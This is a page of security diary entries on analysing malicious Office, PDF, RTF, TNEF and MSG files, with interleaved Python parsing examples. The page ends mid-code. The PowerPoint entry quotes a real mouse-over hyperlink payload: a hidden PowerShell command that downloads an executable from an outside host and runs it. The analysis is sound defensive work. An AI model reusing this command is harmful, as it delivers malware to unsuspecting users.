Diaries

Published: 2017-12-31

Analyzing TNEF files

Yesterday I came across a file type I rarely have to analyze: "Transport Neutral Encapsulation Format" (TNEF). It's an attachment file format used by Outlook and Exchange.

Here is how the file command identifies it:

There are several free and open-source programs and libraries that can parse this file format. The Python module tnefparse comes with a parsing program:

So this TNEF file contains one attached file: an .iso file.
tnefparse can extract this .iso file:
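To show what a TNEF parser like tnefparse does underneath, here is an added example (my own Python code, not part of the diary and not tnefparse's code) of a minimal TNEF walker: it checks the 0x223E9F78 signature, verifies the 16-bit checksum that follows every attribute, and lists attachment names and sizes. The TNEF blob it parses is constructed in the code (it is not the diary's sample); the attribute ids used are attTnefVersion, attAttachRendData, attAttachTitle and attAttachData.

```python
import struct

TNEF_SIGNATURE = 0x223E9F78          # stored little-endian on disk: 78 9F 3E 22
LVL_MESSAGE, LVL_ATTACHMENT = 1, 2   # attribute level byte

# Attribute ids (low 16 bits of the attribute dword) used below
ATT_TNEF_VERSION = 0x9006
ATT_ATTACH_REND_DATA = 0x9002        # marks the start of a new attachment
ATT_ATTACH_TITLE = 0x8010            # attachment file name
ATT_ATTACH_DATA = 0x800F             # attachment bytes
# Attribute types (high 16 bits)
ATP_BYTE, ATP_STRING, ATP_DWORD = 0x0006, 0x0001, 0x0008


def attribute(level, att_id, att_type, data):
    """Serialize one attribute: level, id, type, length, data, 16-bit checksum."""
    return (struct.pack("<BHHI", level, att_id, att_type, len(data))
            + data + struct.pack("<H", sum(data) & 0xFFFF))


def build_sample_tnef():
    """Constructed sample (not a real capture): one attachment named invoice.iso."""
    payload = b"\x00" * 16 + b"CD001"          # dummy bytes standing in for an ISO image
    return (struct.pack("<IH", TNEF_SIGNATURE, 0x1234)      # signature + attachment key
            + attribute(LVL_MESSAGE, ATT_TNEF_VERSION, ATP_DWORD, struct.pack("<I", 0x00010000))
            + attribute(LVL_ATTACHMENT, ATT_ATTACH_REND_DATA, ATP_BYTE, b"\x00" * 14)
            + attribute(LVL_ATTACHMENT, ATT_ATTACH_TITLE, ATP_STRING, b"invoice.iso\x00")
            + attribute(LVL_ATTACHMENT, ATT_ATTACH_DATA, ATP_BYTE, payload))


def parse_tnef(blob):
    """Walk the attribute stream; return [{"name", "size"}] per attachment.
    Raises ValueError on a bad signature, truncation or a checksum mismatch,
    which is what you want when triaging a possibly malformed attachment."""
    if len(blob) < 6 or struct.unpack_from("<I", blob, 0)[0] != TNEF_SIGNATURE:
        raise ValueError("not a TNEF file")
    pos, attachments, current = 6, [], None
    while pos < len(blob):
        if pos + 9 > len(blob):
            raise ValueError("truncated attribute header at offset %d" % pos)
        level, att_id, att_type, length = struct.unpack_from("<BHHI", blob, pos)
        pos += 9
        data = blob[pos:pos + length]
        pos += length
        if len(data) != length or pos + 2 > len(blob):
            raise ValueError("truncated attribute 0x%04x" % att_id)
        (checksum,) = struct.unpack_from("<H", blob, pos)
        pos += 2
        if checksum != (sum(data) & 0xFFFF):
            raise ValueError("checksum mismatch in attribute 0x%04x" % att_id)
        if level != LVL_ATTACHMENT:
            continue
        if att_id == ATT_ATTACH_REND_DATA or current is None:
            current = {"name": None, "size": 0}
            attachments.append(current)
        if att_id == ATT_ATTACH_TITLE:
            # NUL-terminated, in the message's OEM code page; latin-1 is a lossless fallback
            current["name"] = data.rstrip(b"\x00").decode("latin-1")
        elif att_id == ATT_ATTACH_DATA:
            current["size"] = length
    return attachments


if __name__ == "__main__":
    for att in parse_tnef(build_sample_tnef()):
        print(att)
```

The checksum check is deliberate: a TNEF attachment that fails it is either corrupt or crafted, and either way it should not be handed to an extractor that trusts the length fields.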

I've covered the analysis of .iso files before in this diary entry.
 

With 7-zip, I can look into the .iso file:
 

And extract the .exe (MD5 d71e537c1ca1aba1f6854c0cb7b71835) file:
 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2017-12-30

2017, The Flood of CVEs

2017 is almost done and this is my last diary for this year. I made a quick review of my CVE database (I’m using a local cve-search[1] instance). The first interesting number is the number of CVEs created this year. Do you remember when the format was CVE-YYYY-XXXX? The CVE ID format[2] changed in 2014 to lift the limit of 9999 entries per year. This was indeed necessary when you look at the number of entries for the last five years:

  2017: 14680
  2016:  6447
  2015:  6480
  2014:  7946
  2013:  5191

If more and more organisations are taking security into consideration, how can we explain this peak in reported vulnerabilities? First, I think that, in parallel with organisations focusing on security, “attackers” are also more and more active: not only bad guys who are always looking for ways to make more profit, but also students and security researchers. In Europe, offensive security trainings are very popular; people like to learn how to “break stuff”. Also, there has been a huge increase in bug bounty programs[3], which motivate people to search for new vulnerabilities.

We also see new vendors that do not come directly from the IT field but make intensive use of these technologies. Some examples that received (at least) one CVE in 2017:

  • Tesla - CVE-2016-9337[4]
  • Bavarian-Motor-Works (BMW) - CVE-2017-9212[5]
  • Miele (home appliances) - CVE-2017-7240[6]
  • GMV (ATMs) - CVE-2017-6968[7]

Note: I did not even mention all products related to small IoT gadgets, industrial systems, etc.

Does this mean that the security of our products is worse? For many of them, I don’t think so. Most of those vulnerabilities have been fixed by the vendors, which makes their products stronger. Let's think about this scenario: you're looking for a new "device" and you have the choice between two vendors. You have a look at the vulnerabilities associated with each of them. The first one has 10 CVEs and the second one only 2. Does that mean the second one is better? Not necessarily: the first one might have a bug bounty program, or a broader user base (which means more people are looking into its products). The most important thing is to check how they react when a vulnerability is reported to them. Do they fix the vulnerability quickly? Do they try to reduce the noise? Do they (sometimes) prosecute the researcher? Once the vulnerability has been fixed, the main problem remains the process of patching or updating the affected products!

[1] http://cve-search.github.io/cve-search/
[2] https://cve.mitre.org/about/faqs.html#what_is_cve_id
[3] https://www.bugcrowd.com/bug-bounty-list/
[4] https://www.cvedetails.com/cve/CVE-2016-9337/
[5] https://www.cvedetails.com/cve/CVE-2017-9212/
[6] https://www.cvedetails.com/cve/CVE-2017-7240/
[7] https://www.cvedetails.com/cve/CVE-2017-6968/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2017-12-27

What are your Security Challenges for 2018?

We are almost at the end of another year. Last year I wrote a diary on the talent shortage [1] and, from what I have seen, it is still difficult to find the right people with the right skills [2]. I read more than ever that enterprises have to start coming up with creative recruitment strategies to hire the next generation of security professionals (IP-based skill sets) and develop strong training programs to bring them up to speed with the security skills needed to defend or audit their enterprise. Obviously, you can learn a lot of things in a classroom, but some skills can only be acquired in the real world. Anyone who is willing to learn or is curious about how attack methods work and how to defend against them, and who has strong ethics and problem-solving skills, sounds like a candidate you might want to coach and hire.

Technologies are rapidly evolving and changing; keeping on top of all of them is difficult and not really possible. I think it is becoming important to specialize, whether in offensive work (pen testing and audit) or in defending networks. Don't get me wrong, I believe it is important to have a strong understanding of both, but I think at some point picking a side (auditing or defending) is the right thing to do.

Last but not least, cybercrime is going to continue to grow and be more focused on selected targets: products (corporate "secret sauce"), user data, groups and employees. Malicious actors are always looking for new methods to gain access, steal data and sell it to whoever is willing to pay for it.

What are your predictions for the coming year?

[1] https://isc.sans.edu/forums/diary/Is+there+an+Infosec+Cybersecurity+Talent+Shortage/21541/
[2] https://www.bricata.com/blog/cyber-security-talent-shortage/

-----------
Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

2 Comments

Published: 2017-12-25

Dealing with obfuscated RTF files

I see a lot of malicious RTF files that are heavily obfuscated. Recently, I received a sample that neither rtfobj nor rtfdump could handle properly: they could not correctly identify the OLE objects ("Not a well-formed OLE object"). But my rtfdump tool has an option that can help decode objects that are not well-formed. Let's take a closer look.

rtfdump does not identify OLE objects in this sample; however, the h= indicator tells us that there are a lot of hexadecimal characters.

Let's take a closer look at the first sequence with hexadecimal strings (sequence 4 is the first, innermost nested sequence, with 6989 hexadecimal characters and a hexadecimal string of 252 characters):

It looks like an embedded object; however, the control word is \.\objdata while we expect \*\objdata. And it contains an obfuscated hexadecimal string that indicates the presence of an OLE file: d0cf11e0a1b11ae1.

So let's convert this hexadecimal data to binary with option -H:

First we see the string "Equation.3", so this could be an exploit for CVE-2017-11882 (the Equation Editor vulnerability).

Next we see that rtfdump.py was not able to deobfuscate the hexadecimal string correctly: da 0c f1 1e 0a 1b 11 ae 10. There is one extra nibble (a), which shifts all subsequent bytes by 4 bits.

Using option -S, we can try to fix this by shifting the byte sequence by 4 extra bits, making the total shift 8 bits, i.e. one byte:

This time, when we scroll down, we indeed find the exploit command:

This decoded sequence can be dumped (option -d) to extract strings:

Conclusion: when rtfdump is not able to correctly deobfuscate hexadecimal strings, try option -S.
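The nibble-shift idea behind option -S, as an added example (my own Python code, not rtfdump's): the hex payload of an \objdata group is collected with control words, whitespace and junk characters stripped, and then decoded at each of several nibble offsets until the OLE compound-file signature lands on a byte boundary. The RTF fragment is constructed in the code (it is not the diary's sample): one junk nibble precedes the OLE header, and a control word, a junk character and a line break are mixed into the hex string.

```python
import re

OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")   # compound file (OLE) signature

# Constructed sample (not the diary's file): an OLE header followed by the
# "Equation.3" marker, hex-encoded, with one junk nibble in front and a control
# word, a junk character and a line break mixed into the hex string.
_PAYLOAD = OLE_MAGIC + b"\x00" * 8 + b"Equation.3"
_HEX = _PAYLOAD.hex()
SAMPLE_RTF = (r"{\rtf1{\object\objemb{\.\objdata a" + _HEX[:6] + r"\par " + "#"
              + _HEX[6:20] + "\n" + _HEX[20:] + "}}}")


def objdata_hex(rtf):
    """Hex digits of the first \\objdata payload, with control words,
    whitespace and junk characters removed (nested groups inside the payload
    are not handled here; rtfdump does that)."""
    m = re.search(r"\\objdata\b(.*?)\}", rtf, re.S)
    if not m:
        return ""
    body = re.sub(r"\\[a-zA-Z]+-?\d*\s?", "", m.group(1))   # strip control words
    return "".join(c for c in body if c in "0123456789abcdefABCDEF").lower()


def decode_with_shift(hexdigits, shift):
    """Drop `shift` leading nibbles (4 bits each) before pairing nibbles into
    bytes; this is the idea behind rtfdump's -S option."""
    s = hexdigits[shift:]
    return bytes.fromhex(s if len(s) % 2 == 0 else s[:-1])


def find_alignment(hexdigits, max_shift=8):
    """Try each shift until the OLE signature lands on a byte boundary.
    Returns (shift, decoded bytes) or (None, None) if no shift works."""
    for shift in range(max_shift):
        data = decode_with_shift(hexdigits, shift)
        if OLE_MAGIC in data:
            return shift, data
    return None, None


if __name__ == "__main__":
    digits = objdata_hex(SAMPLE_RTF)
    shift, data = find_alignment(digits)
    print("shift needed: %s nibble(s)" % shift)
    print(data[:32].hex(), b"Equation.3" in data)
```

Searching for the signature anywhere in the decoded bytes (rather than only at offset 0) is what makes the loop tolerant of leading junk bytes as well as a stray nibble; when no shift produces the signature, the object is either not OLE or more heavily mangled than a shift can repair, and that is when a manual look at the hex is warranted.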

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2017-12-24

PDF documents & URLs: update

I've written before about PDFs with URLs used in social engineering attacks (TL;DR: nowadays, it's more likely you'll receive a malicious PDF that just contains a malicious URL, than a PDF with malicious code).

Since then, I've had a couple of questions about such PDFs where the URL is stored indirectly. Let me give you an example.

I'm using pdfid.py to do a first check of the pdf (I'm using option -n to suppress counters that are equal to 0):

You can see that name /URI appears twice: this is a strong indication that the PDF contains a URL.

Let's extract the values for name /URI with pdf-parser.py:

Instead of the URL, we see that the value "18 0 R" was extracted. 18 0 R is a reference to the object with id 18 and version 0.

pdf-parser's option -o can be used to look at this object:

By default, pdf-parser displays the dictionary of an object, but not the data. To view this data, use option -w:

Now we can see that object 18 is just a string: the URL we wanted to extract.
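The same lookup done in code, as an added example (my own Python, not pdf-parser's): every /URI value is extracted, and when the value is an indirect reference "n g R" the referenced object is located and its string unescaped. The PDF is constructed inline (it is not the diary's sample) with one inline URL and one stored in object 18, mirroring the case above.

```python
import re

# Constructed sample (not the diary's PDF): two link annotations, one with the
# URL inline and one where /URI points to object 18 by reference.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 5 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://example.com/direct) >> >> endobj
5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI 18 0 R >> >> endobj
18 0 obj (http://example.com/indirect/path) endobj
trailer << /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
# value after /URI: either a literal string (...) or an indirect reference "n g R"
URI_RE = re.compile(rb"/URI\s*(\((?:[^()\\]|\\.)*\)|(\d+)\s+(\d+)\s+R\b)", re.S)
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def index_objects(pdf):
    """Map (id, generation) -> raw object body for every 'n g obj ... endobj'."""
    return {(int(m.group(1)), int(m.group(2))): m.group(3) for m in OBJ_RE.finditer(pdf)}


def pdf_string(token):
    """Unescape a PDF literal string; other tokens are returned as text unchanged."""
    token = token.strip()
    if not (token.startswith(b"(") and token.endswith(b")")):
        return token.decode("latin-1")

    def unescape(m):
        esc = m.group(1)
        if esc[:1].isdigit():                      # \ddd octal escape
            return bytes([int(esc, 8) & 0xFF])
        return ESCAPES.get(esc, esc)               # \( \) \\ map to themselves

    return re.sub(rb"\\([0-7]{1,3}|.)", unescape, token[1:-1], flags=re.S).decode("latin-1")


def extract_uris(pdf):
    """Return [(how, url)] with how = "direct" or "indirect" for every /URI key,
    following 'n g R' references to the object that holds the string."""
    objects = index_objects(pdf)
    found = []
    for m in URI_RE.finditer(pdf):
        if m.group(2):
            ref = (int(m.group(2)), int(m.group(3)))
            found.append(("indirect", pdf_string(objects.get(ref, b""))))
        else:
            found.append(("direct", pdf_string(m.group(1))))
    return found


if __name__ == "__main__":
    for how, url in extract_uris(SAMPLE_PDF):
        print(how, url)
```

Hex strings (<...>) and strings inside object streams are out of scope for this snippet; pdf-parser handles those, and a URL that hides in one of them is exactly why the -w and -o options are worth knowing.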

 

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2017-12-23

Encrypted PDFs

I received a bug report for my pdf-parser: it could not decompress the streams of a PDF document (FlateDecode decompress failed).

The real reason for the error is that the PDF document is encrypted, something that is easy to check with pdfid:

Encrypted PDFs retain their structure; what is encrypted is the content of streams and strings.

pdf-parser.py can analyze encrypted PDFs, but it cannot look into the content of streams and strings: the PDF must be decrypted first, for example with a tool like QPDF.

PDFs can be encrypted for two reasons: DRM and confidentiality. PDFs encrypted for DRM can be decrypted without a password, while PDFs encrypted for confidentiality require a password (QPDF handles both types).

Sometimes, malware authors will encrypt their malicious PDFs to try to evade detection. If you don't know the password of the malicious PDF you want to analyze, you can try to crack the password.
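The pdfid check mentioned above, as an added example (my own Python, not pdfid's code): it counts the names pdfid reports on, undoes #xx hex escapes inside names so that /J#61vaScript is counted as /JavaScript, and reports whether /Encrypt is present, which is the signal that streams and strings are ciphertext. The document is constructed inline (not the reader's bug-report sample): its trailer references an encryption dictionary, and one name is hex-escaped.

```python
import re

# Names pdfid reports on; /Encrypt is the one that explains the "decompress failed" report above.
KEYWORDS = ["/Page", "/Encrypt", "/ObjStm", "/JS", "/JavaScript", "/AA", "/OpenAction",
            "/AcroForm", "/JBIG2Decode", "/RichMedia", "/Launch", "/EmbeddedFile", "/XFA", "/URI"]
NAME_RE = re.compile(rb"/[^\s/\[\]<>(){}%]+")   # a PDF name runs until whitespace or a delimiter

# Constructed sample (not the diary's document): the encryption dictionary is
# referenced from the trailer, a stream holds opaque bytes, and one name is
# hex-escaped (/J#61vaScript) the way evasive files do it.
SAMPLE_ENCRYPTED_PDF = b"""%PDF-1.5
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 6 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Contents 4 0 R >> endobj
4 0 obj << /Length 16 /Filter /FlateDecode >> stream
..ciphertext....
endstream endobj
5 0 obj << /Filter /Standard /V 2 /R 3 /Length 128 /P -1 /O <00> /U <00> >> endobj
6 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj
trailer << /Root 1 0 R /Encrypt 5 0 R /ID [<01> <01>] >>
%%EOF
"""


def normalize_name(raw):
    """Undo #xx hex escapes inside a name so /J#61vaScript counts as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)


def count_names(pdf, suppress_zero=True):
    """Count the keywords above (pdfid style); suppress_zero mirrors pdfid's -n."""
    counts = {k: 0 for k in KEYWORDS}
    for m in NAME_RE.finditer(pdf):
        name = normalize_name(m.group(0)).decode("latin-1")
        if name in counts:
            counts[name] += 1
    return {k: v for k, v in counts.items() if v or not suppress_zero}


def is_encrypted(pdf):
    """True when an /Encrypt entry is present: streams and strings are then
    ciphertext and must be decrypted (e.g. with qpdf) before parsing them."""
    return count_names(pdf).get("/Encrypt", 0) > 0


if __name__ == "__main__":
    print(count_names(SAMPLE_ENCRYPTED_PDF))
    print("encrypted:", is_encrypted(SAMPLE_ENCRYPTED_PDF))
```

When is_encrypted() is true, run the file through qpdf first (qpdf --decrypt in.pdf out.pdf, adding --password=... for a confidentiality-encrypted document) and only then hand the output to pdf-parser; the keyword counts are still meaningful on the encrypted file because names in dictionaries are not encrypted, only strings and streams are.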

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

2 Comments

Published: 2017-12-21

I'm All Up in Your Blockchain, Pilfering Your Wallets

With the latest “gold rush” in cryptocurrency, many people are investing (or speculating, depending on your perspective) in Bitcoin and various other currencies. Many of these people are not the same tech-savvy people who have been mining for years; they are chasing big rates of return. While the economic risks are their own discussion, this post will cover some observations on how to protect the security of your cryptocurrency.

For the most part, an individual’s cryptocurrency is controlled by their wallet (or wallets), which is the recipient and holder of the “coins”. Much like your physical wallet, if that wallet gets taken, most bets are off in terms of your data being taken. Unlike your physical wallet, there is no external way to know your cryptocurrency wallet has been taken: it’s a file, and files can be duplicated and copied.

This happens organically in a wide variety of ways; even security tools will copy and sandbox files they see on the endpoint. If the wallet is not encrypted and the sandbox allows open downloads, that creates situations where entrepreneurial researchers can search for wallet files and use them to appropriate your assets. For example, see the wallet below, which held about $18M USD worth of bitcoin and was seen freely available for download (no, I didn’t take their bitcoins).

Someone with too many bitcoins

The key defense against this is to encrypt the wallet and, for a wallet this size, to keep most of the assets in a “cold wallet” stored offline (i.e. a USB key in a safe), and to minimize any security tools or Microsoft Windows sending telemetry from the machine. As a note, many wallets are encrypted with laughably weak passwords… strong passwords are a must here. Here are some more tips from Bitcoin.org on protecting your wallet.

Many less tech-savvy users rely on various web wallets, where a vendor controls the actual wallet file. If you are working with a reputable vendor, you are probably OK, but exchanges can and do get hacked (Mt. Gox for one); see this recent story about YouBit from South Korea filing for bankruptcy after having lost 4,000 bitcoin. There isn’t much a consumer can do about these kinds of threats because the market is unregulated. If there is a large pool of assets, storing it across multiple vendors can give some degree of risk mitigation.

While people are looking at the upside (well, not at this moment, as BTC is down), there are risks that are unique to an unregulated market, and it all falls on the user to protect themselves.

--
John Bambenek
bambenek \at\ gmail /dot/ com
Fidelis Cybersecurity

0 Comments

Published: 2017-12-19

Example of 'MouseOver' Link in a Powerpoint File

I really like Microsoft Office documents... They offer so many features that can be (ab)used to turn them into virtual bombs. Yesterday, I found a simple but nicely prepared Powerpoint presentation: Payment_copy.ppsx (SHA256:7d6f3eb45c03a8c2fca4685e9f2d4e05c5fc564c3c81926a5305b6fa6808ac3f). It was still unknown on VT yesterday but has now reached a score of 1/61![1] It was delivered to one of my catch-all mailboxes and contained just one slide.

The file extension is .ppsx, which means that, once opened, it will automatically start in slideshow mode (full screen) and present the following slide to the victim:

If, instead of double-clicking the file, you open it from within Powerpoint, you will see that the page has one hyperlink. Thanks to Microsoft, a "hyperlink" does not only refer to a URL but can also refer to an executable or a script. Even more, you can activate it via two techniques: “Mouse Click” or “Mouse Over”:

The application is, of course, a Powershell interpreter with some malicious code passed as the argument. If you extract the XML data from the PowerPoint file, you’ll find:

<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target='powershell%2520-W%2520Hidden%2520-command%2520%28new-object%2520System.Net.WebClient%29.DownloadFile%28%27http%253A%2527+%255Bchar%255D47+%2527%2527+%255Bchar%255D47+%2527ddl3.data.hu%2527+%255Bchar%255D47+%2527get%2527+%255Bchar%255D47+%2527216544%2527+%255Bchar%255D47+%252710920665%2527+%255Bchar%255D47+%2527Payment.exe%27%2C%24env%3ATemp+%27%5CDRXEBY.exe%27%29%3B%28New-Object%2520-com%2520Shell.Application%29.ShellExecute%28%24env%3ATemp+%27%5CDRXEBY.exe%27%29' TargetMode="External"/>
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
</Relationships>

Here is a beautified version of the Powershell command with all its arguments:

powershell -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http'+[char]47+''+[char]47+'ddl3.data.hu'+[char]47+'get'+[char]47+'216544'+[char]47+'10920665'+[char]47+'Payment.exe',$env:Temp+'\DRXEBY.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\DRXEBY.exe')

The payload 'Payment.exe' was still unknown on VT when writing this diary (SHA256:a655f0b97c1d84df09b96ea5c4de986207ef5f7369b6c8f7a897aaa7be06a028). Depending on your Windows environment and Office security settings, you could get a pop-up warning about spawning the malicious Powershell but, in some cases, a simple mouse movement over the link will execute it.
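A triage check for exactly this trick, as an added example (my own Python, not code from the diary): it walks a .ppsx (a zip), reads each slide's relationship file, pairs hyperlink relationships with the element that fires them (hlinkClick or hlinkMouseOver in the slide XML), URL-decodes the target twice as in the sample above, and reports any target that is not a plain web or mail link. The presentation is constructed in the code with a placeholder command line instead of the diary's payload; the part names (ppt/slides/slide1.xml and its _rels file) follow the OOXML package layout.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

NS = {"rel": "http://schemas.openxmlformats.org/package/2006/relationships",
      "a": "http://schemas.openxmlformats.org/drawingml/2006/main",
      "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
      "p": "http://schemas.openxmlformats.org/presentationml/2006/main"}
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
EXPECTED_SCHEMES = ("http://", "https://", "mailto:")   # anything else deserves a look


def build_sample_ppsx():
    """Constructed .ppsx (a zip) with one slide: a normal https link on click
    and a hyperlink relationship whose target is a local command line
    (placeholder text, not the diary's payload) wired to a mouse-over."""
    slide = ('<p:sld xmlns:p="%s" xmlns:a="%s" xmlns:r="%s"><p:cSld><p:spTree>'
             '<p:sp><p:txBody><a:p><a:r><a:rPr><a:hlinkClick r:id="rId3"/></a:rPr>'
             '<a:t>Documentation</a:t></a:r></a:p></p:txBody></p:sp>'
             '<p:sp><p:txBody><a:p><a:r><a:rPr><a:hlinkMouseOver r:id="rId2"/></a:rPr>'
             '<a:t>Loading payment copy...</a:t></a:r></a:p></p:txBody></p:sp>'
             '</p:spTree></p:cSld></p:sld>') % (NS["p"], NS["a"], NS["r"])
    rels = ('<Relationships xmlns="%s">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
            '<Relationship Id="rId2" Type="%s" Target="powershell%%2520-W%%2520Hidden%%2520-command%%2520PLACEHOLDER" TargetMode="External"/>'
            '<Relationship Id="rId3" Type="%s" Target="https://example.com/docs" TargetMode="External"/>'
            '</Relationships>') % (NS["rel"], HYPERLINK_TYPE, HYPERLINK_TYPE)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/slides/slide1.xml", slide)
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


def hyperlink_findings(ppsx_bytes):
    """For each slide, pair hyperlink relationships with the elements that fire
    them (hlinkClick / hlinkMouseOver) and report targets that are not plain
    web or mail links. The target is URL-decoded twice because the sample in
    the diary is double-encoded."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as z:
        names = set(z.namelist())
        for rels_name in sorted(names):
            m = re.fullmatch(r"ppt/slides/_rels/(slide\d+\.xml)\.rels", rels_name)
            if not m:
                continue
            slide_name = "ppt/slides/" + m.group(1)
            triggers = {}                                   # rId -> [trigger element names]
            if slide_name in names:
                for el in ET.fromstring(z.read(slide_name)).iter():
                    tag = el.tag.rsplit("}", 1)[-1]
                    rid = el.get("{%s}id" % NS["r"])
                    if tag in ("hlinkClick", "hlinkMouseOver") and rid:
                        triggers.setdefault(rid, []).append(tag)
            for rel in ET.fromstring(z.read(rels_name)).findall("rel:Relationship", NS):
                if rel.get("Type") != HYPERLINK_TYPE:
                    continue
                target = unquote(unquote(rel.get("Target", "")))
                if not target.lower().startswith(EXPECTED_SCHEMES):
                    findings.append({"slide": m.group(1), "id": rel.get("Id"),
                                     "target": target, "triggers": triggers.get(rel.get("Id"), [])})
    return findings


if __name__ == "__main__":
    for f in hyperlink_findings(build_sample_ppsx()):
        print(f)
```

The trigger list is the useful part for a mail-gateway rule: a hyperlink relationship wired to hlinkMouseOver with a non-URL target has no legitimate use in a slide deck, whereas hlinkClick targets at least require the victim to click.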

[1] https://www.virustotal.com/#/file/7d6f3eb45c03a8c2fca4685e9f2d4e05c5fc564c3c81926a5305b6fa6808ac3f/detection

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

3 Comments

Published: 2017-12-18

Phish or scam? - Part 2

We continue the MSG analysis from yesterday.

There are several ways to take a look at the text contained in a Word .docx file without using MS Office.

Here we will look at the raw XML. The content of a Word file is stored in the following file:

As you can see, the text of the document is contained between XML tags. Filtering out these XML tags, for example with a regular expression and sed, reveals the text without any formatting:

But it can be harder to understand without any newlines, and sometimes this method will strip away info you want to see.
That is why I wrote a simple tool in Python that reads XML and can extract various information: xmldump.py.
You can achieve the same result as with sed by using command xmldump.py text:

Command wordtext is like command text, but it looks for paragraphs (<w:p>) and inserts a newline after extracting the text of each paragraph:
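Both modes side by side, as an added example (my own Python, not xmldump.py's code): text concatenates every w:t node, which is what the sed approach gives, and paragraph mode emits one line per w:p, plus a tab for w:tab and a line break for w:br, so the layout survives. The .docx is constructed in the code (not the reader's attachment) and the content lives in word/document.xml, the part name Word uses for the main body.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def build_sample_docx():
    """Constructed .docx (a zip) whose word/document.xml holds four paragraphs,
    one of them split over two runs with different formatting."""
    document = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                '<w:document xmlns:w="%s"><w:body>'
                '<w:p><w:r><w:t>Dear Sir,</w:t></w:r></w:p>'
                '<w:p><w:r><w:t xml:space="preserve">Please contact </w:t></w:r>'
                '<w:r><w:rPr><w:b/></w:rPr><w:t>agent@example.invalid</w:t></w:r></w:p>'
                '<w:p/>'
                '<w:p><w:r><w:t>Ref:</w:t><w:tab/><w:t>ACME-2017</w:t></w:r></w:p>'
                '</w:body></w:document>') % W
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", document)
    return buf.getvalue()


def docx_text(docx_bytes, paragraph_breaks=True):
    """Text of word/document.xml. With paragraph_breaks=False this is what the
    sed approach gives (all text run together); with True, one line per <w:p>,
    tabs for <w:tab/> and line breaks for <w:br/>, like xmldump.py wordtext."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    if not paragraph_breaks:
        return "".join(t.text or "" for t in root.iter("{%s}t" % W))
    lines = []
    for para in root.iter("{%s}p" % W):
        parts = []
        for el in para.iter():
            tag = el.tag.rsplit("}", 1)[-1]
            if tag == "t":
                parts.append(el.text or "")
            elif tag == "tab":
                parts.append("\t")
            elif tag == "br":
                parts.append("\n")
        lines.append("".join(parts))
    return "\n".join(lines)


if __name__ == "__main__":
    sample = build_sample_docx()
    print(repr(docx_text(sample, paragraph_breaks=False)))
    print(docx_text(sample))
```

Nothing here renders the document, so no field codes, macros or external content are evaluated; that is the point of reading the XML instead of opening the file in Word.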

 

From the content of the Word document, it's clear that this is a scam.
Just for the sake of trying to be thorough, I poked around a bit looking for exploits or feature abuse (like DDE), but found nothing.
 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2017-12-17

Phish or scam? - Part 1

Reader Carlos Almeida submitted an email (an MSG file) with a .docx attachment.

As MSG files are Compound File Binary Format files, we can use oledump to start analyzing this email.

The hexadecimal codes in the stream names are an indication of the purpose and type of the stream data. I developed a new oledump plugin to identify streams in MSG files:

A condensed overview can be obtained using option -q (quiet):

The first column after the hexadecimal data tells us what the data type is: BINary, UNIcode or ASCii.

And the last column informs us about the purpose of the data stream.
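The stream-name decoding that the plugin performs, as an added example (my own Python, not the oledump plugin's code): a __substg1.0_ stream name carries the MAPI property id in its first four hex digits and the property type in the last four, and attachment storages are named __attach_version1.0_#NNNNNNNN. The code classifies a constructed list of stream names (not the reader's MSG; the storage path is written with "/" as a convention of this example) and decodes UNI streams as UTF-16LE the way oledump's -t option does.

```python
import re

# MAPI property types, the last four hex digits of a __substg1.0_ stream name
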